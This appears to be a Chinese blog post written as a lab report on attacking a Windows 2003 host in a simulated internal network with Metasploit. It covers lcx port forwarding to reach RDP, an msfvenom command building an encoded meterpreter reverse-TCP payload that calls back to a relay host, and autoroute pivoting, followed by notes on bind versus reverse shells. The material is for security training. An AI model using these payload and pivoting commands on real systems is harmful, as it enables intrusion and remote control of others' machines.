Metasploit攻击Win2003实例

发布时间 2023-10-26 15:03:09作者: C41829

一、实验目的

在学习并掌握metasploit工具的端口转发进行内网渗透,使用shell编码绕过检测以及了解端口转发原理和使用端口转发常用工具

 

 

二、实验内容

 

在实验模拟环境下对内网中的主机通过端口转发进行渗透,取得主机的shell。

 

三、实验步骤

 

  1. 查看目标机,攻击机,公网机器的ip地址以及账户

 

 

 

2.为了演示内网渗透需要使目标主机与攻击主机不能互相连接,在攻击主机执行下面的iptable配置命令使得目标主机与攻击主机不能相互连接。参数-I是表示Insert(添加),-D表示Delete(删除)。后面跟的是规则,INPUT表示入站,10.1.1.134是攻击主机的IP,DROP表示放弃连接。

iptables -I INPUT -s 10.1.1.134 -j DROP 屏蔽10.1.1.134主机

iptables –L 列出iptables的所有规则

 

 

 3.攻击机与靶机之间不能够互相通信

 

 

4.靶机开启远程桌面

 

 5.监听3300端口

在公网主机执行“lcx –listen tran_port copy_port”端口转发,tran_port为转发端口,copy_port为tran_port的映射端口。将lcx拷贝到桌面,cmd进入桌面,执行下列命令。

 

 

6.在靶机上执行

“lcx –slave attack_ip tran_port localhost_ip 3389”,attack_ip是攻击主机ip,tran_port是攻击主机监听的端口,localhost_ip是目标主机内网ip,3389是目标主机远程桌面使用的端口

 

 

7.在公网主机执行“lcx –listen tran_port copy_port”端口转发,tran_port为转发端口,copy_port为tran_port的映射端口。将lcx拷贝到桌面,cmd进入桌面,执行下列命令。

      lcx -listen 1122 3300

 

 

 

8.打开远程桌面连接,输入本地回环地址和指定的端口号进行远程桌面连接操作

 

 

9.msf进行内网渗透,打开msf

 

 10.使用exploit/multi/handler模块,设置攻击载荷和本地主机流量通过的端口号以及公网主机的ip地址作为RHOST

 

 11.命令行中执行msfvenom命令制作一个能连接公网主机4000端口的反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.143 LPORT=4000 -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe -o /root/payload.exe

 

 

 12.攻击主机执行exploit命令后,将payload.exe拷贝到win2003主机并点击运行, 公网主机运行的lcx程序状态如下

 

 

13.攻击成功后显示:

 

 14.获取uid

 

 15.还可以为metasploit添加到内网的路由,然后进行内网扫描。添加到内网的路由后,metasploit可以访问目标主机内网中的任意一台主机。

 run autoroute -s 10.1.1.134

 

 

 

 

四、实验小结

绑定shell与反弹shell的区别是什么?各自适合于怎样的应用场景?

绑定 Shell:

定义: 绑定 shell 是在目标系统上启动一个网络服务,并等待攻击者连接。一旦连接建立,攻击者就能够与目标系统进行交互。

应用场景: 适用于目标系统能够主动启动网络服务的情况,例如通过运行恶意程序或利用漏洞后,攻击者在目标系统上启动服务等待连接。

反弹 Shell:

定义: 反弹 shell 是攻击者在目标系统上执行恶意代码,使其成为一个网络服务,然后攻击者从远程位置连接到该服务,实现对目标系统的控制。

应用场景: 适用于目标系统能够执行外部命令的情况,例如攻击者成功注入代码或利用漏洞后,目标系统能够与攻击者的服务器建立连接。

选择使用场景:

绑定 Shell: 适用于目标系统能够主动启动网络服务,而攻击者需要等待连接的情况,比如目标系统中运行了一个可利用的漏洞。

反弹 Shell: 适用于攻击者能够在目标系统上执行代码,建立一个与攻击者控制服务器的连接,使得攻击者可以主动控制目标系统。

 

使用php语言编写一个端口转发的程序:

 

本地服务器: 运行这个 PHP 脚本的服务器(本地监听地址为 127.0.0.1,端口为 8888)。

目标服务器: 一个你想与之通信的目标服务器(目标地址为 目标IP,端口为 8080)。

运行此php脚本后,简单的场景模型如下:

客户端 <-> 本地服务器 <-> 目标服务器